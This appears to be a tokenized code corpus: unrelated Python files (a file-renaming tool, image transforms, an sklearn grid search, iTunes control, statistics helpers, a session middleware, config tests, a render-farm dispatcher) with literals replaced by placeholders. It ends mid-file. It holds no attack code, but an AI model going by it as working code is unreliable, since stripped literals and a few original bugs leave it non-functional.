<EOL> return self . _remdups <EOL> @ remdups . setter <EOL> def remdups ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _remdups = boolean <EOL> @ property <EOL> def remext ( self ) : <EOL> return self . _remext <EOL> @ remext . setter <EOL> def remext ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _remext = boolean <EOL> @ property <EOL> def remnonwords ( self ) : <EOL> return self . _remnonwords <EOL> @ remnonwords . setter <EOL> def remnonwords ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _remnonwords = boolean <EOL> @ property <EOL> def ignorecase ( self ) : <EOL> return self . _ignorecase <EOL> @ ignorecase . setter <EOL> def ignorecase ( self , boolean ) : <EOL> flag = <NUM_LIT:0> <EOL> if boolean : <EOL> flag = re . I <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _ignorecase = flag <EOL> @ property <EOL> def mediamode ( self ) : <EOL> return self . _mediamode <EOL> @ mediamode . setter <EOL> def mediamode ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _mediamode = boolean <EOL> @ property <EOL> def countcheck ( self ) : <EOL> return self . _countcheck <EOL> @ countcheck . setter <EOL> def countcheck ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _countcheck = boolean <EOL> @ property <EOL> def countfill ( self ) : <EOL> return self . _countfill <EOL> @ countfill . setter <EOL> def countfill ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _countfill = boolean <EOL> @ property <EOL> def countpos ( self ) : <EOL> return self . _countpos <EOL> @ countpos . setter <EOL> def countpos ( self , index ) : <EOL> log . debug ( "<STR_LIT>" . format ( index ) ) <EOL> self . _countpos = index <EOL> @ property <EOL> def countbase ( self ) : <EOL> return self . _countbase <EOL> @ countbase . setter <EOL> def countbase ( self , num ) : <EOL> log . debug ( "<STR_LIT>" . format ( num ) ) <EOL> self . _countbase = num <EOL> @ property <EOL> def countstep ( self ) : <EOL> return self . _countstep <EOL> @ countstep . setter <EOL> def countstep ( self , num ) : <EOL> log . debug ( "<STR_LIT>" . format ( num ) ) <EOL> self . _countstep = num <EOL> @ property <EOL> def insertcheck ( self ) : <EOL> return self . _insertcheck <EOL> @ insertcheck . setter <EOL> def insertcheck ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _insertcheck = boolean <EOL> @ property <EOL> def insertpos ( self ) : <EOL> return self . _insertpos <EOL> @ insertpos . setter <EOL> def insertpos ( self , index ) : <EOL> log . debug ( "<STR_LIT>" . format ( index ) ) <EOL> self . _insertpos = index <EOL> @ property <EOL> def deletecheck ( self ) : <EOL> return self . _deletecheck <EOL> @ deletecheck . setter <EOL> def deletecheck ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _deletecheck = boolean <EOL> @ property <EOL> def deletestart ( self ) : <EOL> return self . _deletestart <EOL> @ deletestart . setter <EOL> def deletestart ( self , index ) : <EOL> log . debug ( "<STR_LIT>" . format ( index ) ) <EOL> self . _deletestart = index <EOL> @ property <EOL> def deleteend ( self ) : <EOL> return self . _deleteend <EOL> @ deleteend . setter <EOL> def deleteend ( self , index ) : <EOL> log . debug ( "<STR_LIT>" . format ( index ) ) <EOL> self . _deleteend = index <EOL> @ property <EOL> def casecheck ( self ) : <EOL> return self . _casecheck <EOL> @ casecheck . setter <EOL> def casecheck ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _casecheck = boolean <EOL> @ property <EOL> def casemode ( self ) : <EOL> return self . _casemode <EOL> @ casemode . setter <EOL> def casemode ( self , num ) : <EOL> log . debug ( "<STR_LIT>" . format ( num ) ) <EOL> self . _casemode = num <EOL> @ property <EOL> def spacecheck ( self ) : <EOL> return self . _spacecheck <EOL> @ spacecheck . setter <EOL> def spacecheck ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _spacecheck = boolean <EOL> @ property <EOL> def spacemode ( self ) : <EOL> return self . _spacemode <EOL> @ spacemode . setter <EOL> def spacemode ( self , num ) : <EOL> log . debug ( "<STR_LIT>" . format ( num ) ) <EOL> self . _spacemode = num <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> fileops = FileOps ( hidden = True , recursive = True , casemode = "<STR_LIT:1>" ) <EOL> fileops . get_previews ( fileops . get_targets ( ) , "<STR_LIT:*>" , "<STR_LIT>" ) </s>
<s> from PIL import Image <EOL> TRANSFORM_AXIS = { <EOL> Image . EXTENT : ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ) , <EOL> Image . AFFINE : ( None , None , <NUM_LIT:0> , None , None , <NUM_LIT:1> ) , <EOL> Image . QUAD : ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ) , <EOL> Image . PERSPECTIVE : ( None , None , None , None , None , None , None , None ) , <EOL> } <EOL> class Transform ( list ) : <EOL> def __init__ ( self , spec , image_size = None ) : <EOL> super ( Transform , self ) . __init__ ( spec ) <EOL> self . flag = getattr ( Image , self [ <NUM_LIT:0> ] . upper ( ) ) <EOL> try : <EOL> axis = ( None , <NUM_LIT:0> , <NUM_LIT:1> ) + TRANSFORM_AXIS [ self . flag ] <EOL> except KeyError : <EOL> raise ValueError ( '<STR_LIT>' % self [ <NUM_LIT:0> ] ) <EOL> if len ( self ) != len ( axis ) : <EOL> raise ValueError ( '<STR_LIT>' % ( len ( axis ) , len ( self ) ) ) <EOL> for i in xrange ( <NUM_LIT:1> , len ( self ) ) : <EOL> v = self [ i ] <EOL> if isinstance ( v , basestring ) : <EOL> if v [ - <NUM_LIT:1> : ] in ( '<STR_LIT:%>' , '<STR_LIT:p>' ) : <EOL> if axis [ i ] is None : <EOL> raise ValueError ( '<STR_LIT>' % ( self [ <NUM_LIT:0> ] , i ) ) <EOL> if image_size is None : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> self [ i ] = image_size [ axis [ i ] ] * float ( v [ : - <NUM_LIT:1> ] ) / <NUM_LIT:100> <EOL> else : <EOL> self [ i ] = float ( v ) <EOL> if not self [ <NUM_LIT:1> ] or not self [ <NUM_LIT:2> ] : <EOL> if not image_size : <EOL> ValueError ( '<STR_LIT>' ) <EOL> self [ <NUM_LIT:1> ] = int ( self [ <NUM_LIT:1> ] or image_size [ <NUM_LIT:0> ] ) <EOL> self [ <NUM_LIT:2> ] = int ( self [ <NUM_LIT:2> ] or image_size [ <NUM_LIT:1> ] ) <EOL> @ property <EOL> def size ( self ) : <EOL> return self [ <NUM_LIT:1> ] , self [ <NUM_LIT:2> ] <EOL> def apply ( self , image ) : <EOL> return image . transform ( <EOL> ( int ( self [ <NUM_LIT:1> ] or image . size [ <NUM_LIT:0> ] ) , int ( self [ <NUM_LIT:2> ] or image . size [ <NUM_LIT:1> ] ) ) , <EOL> self . flag , <EOL> self [ <NUM_LIT:3> : ] , <EOL> Image . BILINEAR , <EOL> ) </s>
<s> from sklearn . datasets import load_files <EOL> from sklearn . feature_extraction . text import TfidfVectorizer <EOL> from sklearn . grid_search import GridSearchCV <EOL> from sklearn . pipeline import Pipeline <EOL> from sklearn . svm import LinearSVC <EOL> data = load_files ( '<STR_LIT>' ) <EOL> vect = TfidfVectorizer ( ) <EOL> X = vect . fit_transform ( data . data ) <EOL> params = { "<STR_LIT>" : [ ( <NUM_LIT:1> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:2> ) ] , <EOL> "<STR_LIT>" : [ <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:8> , <NUM_LIT:10> ] , <EOL> "<STR_LIT>" : [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> "<STR_LIT>" : [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:2> ] <EOL> } <EOL> clf = Pipeline ( [ ( "<STR_LIT>" , TfidfVectorizer ( sublinear_tf = True ) ) , <EOL> ( "<STR_LIT>" , LinearSVC ( loss = '<STR_LIT>' , max_iter = <NUM_LIT:1000> ) ) ] ) <EOL> gs = GridSearchCV ( clf , params , verbose = <NUM_LIT:2> , n_jobs = - <NUM_LIT:1> ) <EOL> gs . fit ( data . data , data . target ) <EOL> print ( gs . best_estimator_ ) <EOL> print ( gs . best_score_ ) <EOL> '''<STR_LIT>''' </s>
<s> import speech <EOL> import subprocess <EOL> import os <EOL> import platform <EOL> import settings <EOL> DEFAULT_ITUNES_PLAY = """<STR_LIT>""" <EOL> ITUNES_SONG_AND_ARTIST = """<STR_LIT>""" <EOL> ITUNES_ALBUM_AND_ARTIST = """<STR_LIT>""" <EOL> ITUNES_ALBUM = """<STR_LIT>""" <EOL> ITUNES_ARTIST = """<STR_LIT>""" <EOL> SKIP = """<STR_LIT>""" <EOL> PAUSE = """<STR_LIT>""" <EOL> RESUME = """<STR_LIT>""" <EOL> def pause ( ) : <EOL> """<STR_LIT>""" <EOL> if not platformCompatible ( ) : <EOL> return False <EOL> ( output , error ) = subprocess . Popen ( [ "<STR_LIT>" , "<STR_LIT>" , PAUSE ] , stdout = subprocess . PIPE ) . communicate ( ) <EOL> def resume ( ) : <EOL> """<STR_LIT>""" <EOL> if not platformCompatible ( ) : <EOL> return False <EOL> ( output , error ) = subprocess . Popen ( [ "<STR_LIT>" , "<STR_LIT>" , RESUME ] , stdout = subprocess . PIPE ) . communicate ( ) <EOL> def skip ( ) : <EOL> """<STR_LIT>""" <EOL> if not platformCompatible ( ) : <EOL> return False <EOL> ( output , error ) = subprocess . Popen ( [ "<STR_LIT>" , "<STR_LIT>" , SKIP ] , stdout = subprocess . PIPE ) . communicate ( ) <EOL> def play ( song , artist = None , album = None ) : <EOL> """<STR_LIT>""" <EOL> if not settings . platformCompatible ( ) : <EOL> return False <EOL> if song and not artist and not album : <EOL> ( output , error ) = subprocess . Popen ( [ "<STR_LIT>" , "<STR_LIT>" , DEFAULT_ITUNES_PLAY % ( song , song , song ) ] , stdout = subprocess . PIPE ) . communicate ( ) <EOL> if output : <EOL> speech . speak ( "<STR_LIT>" + output ) <EOL> else : <EOL> speech . speak ( "<STR_LIT>" + song + "<STR_LIT>" ) <EOL> elif song and artist and not album : <EOL> ( output , error ) = subprocess . Popen ( [ "<STR_LIT>" , "<STR_LIT>" , ITUNES_SONG_AND_ARTIST % ( song , artist , song , artist ) ] , stdout = subprocess . PIPE ) . communicate ( ) <EOL> if output : <EOL> speech . speak ( "<STR_LIT>" + output ) <EOL> else : <EOL> speech . speak ( "<STR_LIT>" + song + "<STR_LIT>" ) <EOL> elif album and artist and not song : <EOL> ( output , error ) = subprocess . Popen ( [ "<STR_LIT>" , "<STR_LIT>" , ITUNES_ALBUM_AND_ARTIST % ( artist , album ) ] , stdout = subprocess . PIPE ) . communicate ( ) <EOL> if output : <EOL> speech . speak ( "<STR_LIT>" + output ) <EOL> else : <EOL> speech . speak ( "<STR_LIT>" + song + "<STR_LIT>" ) <EOL> elif album and not artist and not song : <EOL> ( output , error ) = subprocess . Popen ( [ "<STR_LIT>" , "<STR_LIT>" , ITUNES_ALBUM % ( album ) ] , stdout = subprocess . PIPE ) . communicate ( ) <EOL> if output : <EOL> speech . speak ( "<STR_LIT>" + output ) <EOL> else : <EOL> speech . speak ( "<STR_LIT>" + song + "<STR_LIT>" ) <EOL> elif artist and not album and not song : <EOL> ( output , error ) = subprocess . Popen ( [ "<STR_LIT>" , "<STR_LIT>" , ITUNES_ARTIST % ( artist ) ] , stdout = subprocess . PIPE ) . communicate ( ) <EOL> if output : <EOL> speech . speak ( "<STR_LIT>" + output ) <EOL> else : <EOL> speech . speak ( "<STR_LIT>" + song + "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> import math <EOL> import re <EOL> def percent_of ( part , whole ) : <EOL> """<STR_LIT>""" <EOL> return float ( part * <NUM_LIT:100> ) / whole <EOL> def mean ( r ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return float ( sum ( r ) ) / len ( r ) <EOL> except ZeroDivisionError : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> average = mean <EOL> def median ( r ) : <EOL> """<STR_LIT>""" <EOL> s = list ( r ) <EOL> s_len = len ( s ) <EOL> if s_len == <NUM_LIT:0> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> s . sort ( ) <EOL> center = s_len // <NUM_LIT:2> <EOL> is_odd = s_len % <NUM_LIT:2> <EOL> if is_odd : <EOL> return s [ center ] <EOL> low = s [ center - <NUM_LIT:1> ] <EOL> high = s [ center ] <EOL> return mean ( [ low , high ] ) <EOL> def standard_deviation ( r , sample = True ) : <EOL> """<STR_LIT>""" <EOL> avg = average ( r ) <EOL> sdsq = sum ( [ ( i - avg ) ** <NUM_LIT:2> for i in r ] ) <EOL> if sample : <EOL> normal_denom = len ( r ) - <NUM_LIT:1> or <NUM_LIT:1> <EOL> else : <EOL> normal_denom = len ( r ) <EOL> return ( sdsq / normal_denom ) ** <NUM_LIT:0.5> <EOL> def format_data_size ( size , unit , precision = <NUM_LIT:1> , binary = False , full_name = False ) : <EOL> """<STR_LIT>""" <EOL> if full_name is None : <EOL> full_name = len ( unit ) > <NUM_LIT:1> <EOL> if not binary : <EOL> base = <NUM_LIT:1000> <EOL> if full_name : <EOL> multiples = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> else : <EOL> multiples = ( '<STR_LIT>' , '<STR_LIT:k>' , '<STR_LIT:M>' , '<STR_LIT>' , '<STR_LIT:T>' , '<STR_LIT:P>' , '<STR_LIT:E>' , '<STR_LIT>' , '<STR_LIT:Y>' ) <EOL> else : <EOL> base = <NUM_LIT> <EOL> if full_name : <EOL> multiples = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> else : <EOL> multiples = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> sign = "<STR_LIT>" <EOL> if size > <NUM_LIT:0> : <EOL> m = int ( math . log ( size , base ) ) <EOL> elif size < <NUM_LIT:0> : <EOL> sign = "<STR_LIT:->" <EOL> size = - size <EOL> m = int ( math . log ( size , base ) ) <EOL> else : <EOL> m = <NUM_LIT:0> <EOL> if m > <NUM_LIT:8> : <EOL> m = <NUM_LIT:8> <EOL> if m == <NUM_LIT:0> : <EOL> precision = '<STR_LIT>' <EOL> else : <EOL> precision = '<STR_LIT>' % precision <EOL> size = precision % ( size / math . pow ( base , m ) ) <EOL> return '<STR_LIT>' % ( sign , size . strip ( ) , multiples [ m ] , unit ) <EOL> def format_byte_size ( size , precision = <NUM_LIT:1> , binary = False , full_name = False ) : <EOL> """<STR_LIT>""" <EOL> if full_name : <EOL> return format_data_size ( size , "<STR_LIT>" , precision , binary , True ) <EOL> else : <EOL> return format_data_size ( size , "<STR_LIT:B>" , precision , binary , False ) <EOL> def format_bit_size ( size , precision = <NUM_LIT:1> , binary = False , full_name = False ) : <EOL> """<STR_LIT>""" <EOL> if full_name : <EOL> return format_data_size ( size , "<STR_LIT>" , precision , binary , True ) <EOL> else : <EOL> return format_data_size ( size , "<STR_LIT:b>" , precision , binary , False ) </s>
<s> from webob import Request , Response <EOL> class SessionManager ( object ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , application = None , days = <NUM_LIT> , session_class = None ) : <EOL> self . session_class = session_class <EOL> self . days = days <EOL> if application : <EOL> self . application = application <EOL> else : <EOL> self . applicaion = Response ( ) <EOL> def __call__ ( self , environ , start_response ) : <EOL> req = Request ( environ ) <EOL> environ [ '<STR_LIT>' ] = self . session_class . _before ( req ) <EOL> environ . setdefault ( '<STR_LIT>' , { } ) [ '<STR_LIT>' ] = environ [ '<STR_LIT>' ] <EOL> resp = req . get_response ( self . application ) <EOL> environ [ '<STR_LIT>' ] . _after ( req , resp ) <EOL> return resp ( environ , start_response ) </s>
<s> import unittest <EOL> import pybald <EOL> from pybald import context <EOL> class TestConfig ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> pass <EOL> def tearDown ( self ) : <EOL> context . _reset ( ) <EOL> def test_default_config ( self ) : <EOL> "<STR_LIT>" <EOL> context = pybald . configure ( ) <EOL> assert context . config . debug == True <EOL> assert context . config . env_name == '<STR_LIT>' <EOL> def test_read_from_file ( self ) : <EOL> "<STR_LIT>" <EOL> context = pybald . configure ( config_file = "<STR_LIT>" ) <EOL> assert context . config . sample_config == True <EOL> assert context . config . env_name == '<STR_LIT>' <EOL> def test_read_from_object ( self ) : <EOL> "<STR_LIT>" <EOL> config_obj = dict ( conf_object = True , env_name = "<STR_LIT>" ) <EOL> context = pybald . configure ( config_object = config_obj ) <EOL> assert context . config . conf_object == True <EOL> assert context . config . env_name == "<STR_LIT>" <EOL> def test_missing_file ( self ) : <EOL> "<STR_LIT>" <EOL> try : <EOL> pybald . configure ( config_file = "<STR_LIT>" ) <EOL> except SystemExit : <EOL> pass <EOL> else : <EOL> self . fail ( '<STR_LIT>' ) </s>
<s> from east import utils <EOL> def worst_case_strings_collection ( m , n ) : <EOL> prefix = utils . random_string ( n - <NUM_LIT:2> ) <EOL> strings_collection = [ prefix + utils . random_string ( <NUM_LIT:2> ) for _ in xrange ( m ) ] <EOL> return strings_collection </s>
<s> from pipulate import * <EOL> import os <EOL> import globs , common <EOL> print ( r'''<STR_LIT>''' ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> globs . WEB = True <EOL> if '<STR_LIT>' in socket . gethostname ( ) : <EOL> globs . PCOM = True <EOL> app . run ( host = '<STR_LIT>' , port = <NUM_LIT> , debug = True ) <EOL> else : <EOL> app . run ( host = '<STR_LIT>' , port = <NUM_LIT> , debug = False ) </s>
<s> """<STR_LIT>""" <EOL> __version__ = "<STR_LIT>" <EOL> IS_CLINT = True <EOL> try : <EOL> from clint . textui import colored <EOL> except ImportError : <EOL> IS_CLINT = False <EOL> def disable_color ( ) : <EOL> """<STR_LIT>""" <EOL> if IS_CLINT : <EOL> colored . disable ( ) <EOL> def __get_message ( prefix , message , color_function ) : <EOL> """<STR_LIT>""" <EOL> message = "<STR_LIT>" . format ( prefix , message ) <EOL> if IS_CLINT : <EOL> return color_function ( message ) <EOL> else : <EOL> return message <EOL> def get_error_message ( message ) : <EOL> """<STR_LIT>""" <EOL> if IS_CLINT : <EOL> func = colored . red <EOL> else : <EOL> func = None <EOL> return __get_message ( "<STR_LIT>" , message , func ) <EOL> def get_warning_message ( message ) : <EOL> """<STR_LIT>""" <EOL> if IS_CLINT : <EOL> func = colored . yellow <EOL> else : <EOL> func = None <EOL> return __get_message ( "<STR_LIT>" , message , func ) <EOL> def get_success_message ( message ) : <EOL> """<STR_LIT>""" <EOL> if IS_CLINT : <EOL> func = colored . green <EOL> else : <EOL> func = None <EOL> return __get_message ( "<STR_LIT>" , message , func ) <EOL> def print_error_message ( message ) : <EOL> """<STR_LIT>""" <EOL> print get_error_message ( message ) <EOL> def print_warning_message ( message ) : <EOL> """<STR_LIT>""" <EOL> print get_warning_message ( message ) <EOL> def print_success_message ( message ) : <EOL> """<STR_LIT>""" <EOL> print get_success_message ( message ) </s>
<s> from __future__ import absolute_import <EOL> """<STR_LIT:U+0020>""" <EOL> from puliclient . server . renderNodeHandler import RenderNodeHandler <EOL> from octopus . core import enums <EOL> rnHandler = RenderNodeHandler ( ) <EOL> ( allRnList , summary ) = rnHandler . getAllRenderNodes ( ) <EOL> print "<STR_LIT>" <EOL> if allRnList : <EOL> for rn in allRnList : <EOL> print "<STR_LIT>" % ( rn . id , rn . name , rn . host , rn . systemFreeRam , rn . ramSize ) <EOL> ( results , summary ) = rnHandler . getRenderNodes ( <EOL> idList = [ <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> ] , <EOL> nameList = [ "<STR_LIT>" ] , <EOL> hostList = [ "<STR_LIT>" ] , <EOL> versionList = [ "<STR_LIT>" ] , <EOL> poolList = [ "<STR_LIT:default>" , "<STR_LIT>" ] , <EOL> statusList = [ enums . RN_IDLE ] , <EOL> ) <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> if results : <EOL> for rn in results : <EOL> print "<STR_LIT>" % ( rn . id , rn . name , rn . host , rn . puliversion , rn . systemFreeRam , rn . ramSize ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import with_statement <EOL> import logging <EOL> import socket <EOL> import time <EOL> from Queue import Queue <EOL> from itertools import groupby , ifilter , chain <EOL> import collections <EOL> try : <EOL> import simplejson as json <EOL> except ImportError : <EOL> import json <EOL> from octopus . core import singletonconfig , singletonstats <EOL> from octopus . core . threadpool import ThreadPool , makeRequests , NoResultsPending <EOL> from octopus . core . framework import MainLoopApplication <EOL> from octopus . core . tools import elapsedTimeToString <EOL> from octopus . dispatcher . model import ( DispatchTree , FolderNode , RenderNode , <EOL> Pool , PoolShare , enums ) <EOL> from octopus . dispatcher . strategies import FifoStrategy <EOL> from octopus . dispatcher import settings <EOL> from octopus . dispatcher . db . pulidb import PuliDB <EOL> from octopus . dispatcher . model . enums import * <EOL> from octopus . dispatcher . poolman . filepoolman import FilePoolManager <EOL> from octopus . dispatcher . poolman . wspoolman import WebServicePoolManager <EOL> from octopus . dispatcher . licenses . licensemanager import LicenseManager <EOL> class Dispatcher ( MainLoopApplication ) : <EOL> '''<STR_LIT>''' <EOL> instance = None <EOL> init = False <EOL> def __new__ ( cls , framework ) : <EOL> if cls . instance is None : <EOL> cls . instance = super ( Dispatcher , cls ) . __new__ ( cls ) <EOL> return cls . instance <EOL> def __init__ ( self , framework ) : <EOL> LOGGER = logging . getLogger ( '<STR_LIT>' ) <EOL> if self . init : <EOL> return <EOL> self . init = True <EOL> self . nextCycle = time . time ( ) <EOL> MainLoopApplication . __init__ ( self , framework ) <EOL> self . threadPool = ThreadPool ( <NUM_LIT:16> , <NUM_LIT:0> , <NUM_LIT:0> , None ) <EOL> self . cycle = <NUM_LIT:1> <EOL> self . dispatchTree = DispatchTree ( ) <EOL> self . licenseManager = LicenseManager ( ) <EOL> self . enablePuliDB = settings . DB_ENABLE <EOL> self . cleanDB = settings . DB_CLEAN_DATA <EOL> self . restartService = False <EOL> self . pulidb = None <EOL> if self . enablePuliDB : <EOL> self . pulidb = PuliDB ( self . cleanDB , self . licenseManager ) <EOL> self . dispatchTree . registerModelListeners ( ) <EOL> rnsAlreadyInitialized = self . initPoolsDataFromBackend ( ) <EOL> if self . enablePuliDB and not self . cleanDB : <EOL> LOGGER . warning ( "<STR_LIT>" ) <EOL> prevTimer = time . time ( ) <EOL> self . pulidb . restoreStateFromDb ( self . dispatchTree , rnsAlreadyInitialized ) <EOL> LOGGER . warning ( "<STR_LIT>" % len ( self . dispatchTree . tasks ) ) <EOL> LOGGER . warning ( "<STR_LIT>" % elapsedTimeToString ( prevTimer ) ) <EOL> LOGGER . warning ( "<STR_LIT>" ) <EOL> LOGGER . warning ( "<STR_LIT>" ) <EOL> startTimer = time . time ( ) <EOL> LOGGER . warning ( "<STR_LIT>" ) <EOL> self . dispatchTree . updateCompletionAndStatus ( ) <EOL> LOGGER . warning ( "<STR_LIT>" % elapsedTimeToString ( startTimer ) ) <EOL> prevTimer = time . time ( ) <EOL> LOGGER . warning ( "<STR_LIT>" ) <EOL> self . updateRenderNodes ( ) <EOL> LOGGER . warning ( "<STR_LIT>" % elapsedTimeToString ( prevTimer ) ) <EOL> prevTimer = time . time ( ) <EOL> LOGGER . warning ( "<STR_LIT>" ) <EOL> self . dispatchTree . validateDependencies ( ) <EOL> LOGGER . warning ( "<STR_LIT>" % elapsedTimeToString ( prevTimer ) ) <EOL> LOGGER . warning ( "<STR_LIT>" % elapsedTimeToString ( startTimer ) ) <EOL> LOGGER . warning ( "<STR_LIT>" ) <EOL> if self . enablePuliDB and not self . cleanDB : <EOL> self . dispatchTree . toModifyElements = [ ] <EOL> if '<STR_LIT:default>' not in self . dispatchTree . pools : <EOL> pool = Pool ( None , name = '<STR_LIT:default>' ) <EOL> LOGGER . warning ( "<STR_LIT>" % pool ) <EOL> self . defaultPool = self . dispatchTree . pools [ '<STR_LIT:default>' ] <EOL> LOGGER . warning ( "<STR_LIT>" ) <EOL> startTimer = time . time ( ) <EOL> self . loadRules ( ) <EOL> LOGGER . warning ( "<STR_LIT>" % elapsedTimeToString ( startTimer ) ) <EOL> LOGGER . warning ( "<STR_LIT>" ) <EOL> self . queue = Queue ( maxsize = <NUM_LIT> ) <EOL> def initPoolsDataFromBackend ( self ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> if settings . POOLS_BACKEND_TYPE == "<STR_LIT:file>" : <EOL> manager = FilePoolManager ( ) <EOL> elif settings . POOLS_BACKEND_TYPE == "<STR_LIT>" : <EOL> manager = WebServicePoolManager ( ) <EOL> elif settings . POOLS_BACKEND_TYPE == "<STR_LIT>" : <EOL> return False <EOL> except Exception : <EOL> return False <EOL> computers = manager . listComputers ( ) <EOL> poolsList = manager . listPools ( ) <EOL> poolsById = { } <EOL> for poolDesc in poolsList : <EOL> pool = Pool ( id = int ( poolDesc . id ) , name = str ( poolDesc . name ) ) <EOL> self . dispatchTree . toCreateElements . append ( pool ) <EOL> poolsById [ pool . id ] = pool <EOL> rnById = { } <EOL> for computerDesc in computers : <EOL> try : <EOL> computerDesc . name = socket . getfqdn ( computerDesc . name ) <EOL> ip = socket . gethostbyname ( computerDesc . name ) <EOL> except socket . gaierror : <EOL> continue <EOL> renderNode = RenderNode ( computerDesc . id , computerDesc . name + "<STR_LIT::>" + str ( computerDesc . port ) , computerDesc . cpucount * computerDesc . cpucores , computerDesc . cpufreq , ip , computerDesc . port , computerDesc . ramsize , json . loads ( computerDesc . properties ) ) <EOL> self . dispatchTree . toCreateElements . append ( renderNode ) <EOL> for pool in computerDesc . pools : <EOL> poolsById [ pool . id ] . renderNodes . append ( renderNode ) <EOL> renderNode . pools . append ( poolsById [ pool . id ] ) <EOL> self . dispatchTree . renderNodes [ str ( renderNode . name ) ] = renderNode <EOL> rnById [ renderNode . id ] = renderNode <EOL> for pool in poolsById . values ( ) : <EOL> self . dispatchTree . pools [ pool . name ] = pool <EOL> if self . cleanDB or not self . enablePuliDB : <EOL> graphs = FolderNode ( <NUM_LIT:1> , "<STR_LIT>" , self . dispatchTree . root , "<STR_LIT:root>" , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , FifoStrategy ( ) ) <EOL> self . dispatchTree . toCreateElements . append ( graphs ) <EOL> self . dispatchTree . nodes [ graphs . id ] = graphs <EOL> ps = PoolShare ( <NUM_LIT:1> , self . dispatchTree . pools [ "<STR_LIT:default>" ] , graphs , PoolShare . UNBOUND ) <EOL> self . dispatchTree . toCreateElements . append ( ps ) <EOL> if self . enablePuliDB : <EOL> self . pulidb . dropPoolsAndRnsTables ( ) <EOL> self . pulidb . createElements ( self . dispatchTree . toCreateElements ) <EOL> self . dispatchTree . resetDbElements ( ) <EOL> return True <EOL> def shutdown ( self ) : <EOL> '''<STR_LIT>''' <EOL> logging . getLogger ( '<STR_LIT>' ) . warning ( "<STR_LIT>" ) <EOL> logging . getLogger ( '<STR_LIT>' ) . warning ( "<STR_LIT>" ) <EOL> try : <EOL> self . dispatchTree . updateCompletionAndStatus ( ) <EOL> logging . getLogger ( '<STR_LIT>' ) . warning ( "<STR_LIT>" ) <EOL> except Exception : <EOL> logging . getLogger ( '<STR_LIT>' ) . warning ( "<STR_LIT>" ) <EOL> try : <EOL> self . updateRenderNodes ( ) <EOL> logging . getLogger ( '<STR_LIT>' ) . warning ( "<STR_LIT>" ) <EOL> except Exception : <EOL> logging . getLogger ( '<STR_LIT>' ) . warning ( "<STR_LIT>" ) <EOL> try : <EOL> self . dispatchTree . validateDependencies ( ) <EOL> logging . getLogger ( '<STR_LIT>' ) . warning ( "<STR_LIT>" ) <EOL> except Exception : <EOL> logging . getLogger ( '<STR_LIT>' ) . warning ( "<STR_LIT>" ) <EOL> try : <EOL> self . updateDB ( ) <EOL> logging . getLogger ( '<STR_LIT>' ) . warning ( "<STR_LIT>" ) <EOL> except Exception : <EOL> logging . getLogger ( '<STR_LIT>' ) . warning ( "<STR_LIT>" ) <EOL> def loadRules ( self ) : <EOL> from . rules . graphview import GraphViewBuilder <EOL> graphs = self . dispatchTree . findNodeByPath ( "<STR_LIT>" , None ) <EOL> if graphs is None : <EOL> logging . getLogger ( '<STR_LIT>' ) . fatal ( "<STR_LIT>" ) <EOL> self . stop ( ) <EOL> self . dispatchTree . rules . append ( GraphViewBuilder ( self . dispatchTree , graphs ) ) <EOL> def prepare ( self ) : <EOL> pass <EOL> def stop ( self ) : <EOL> '''<STR_LIT>''' <EOL> pass <EOL> @ property <EOL> def modified ( self ) : <EOL> return bool ( self . dispatchTree . toArchiveElements or <EOL> self . dispatchTree . toCreateElements or <EOL> self . dispatchTree . 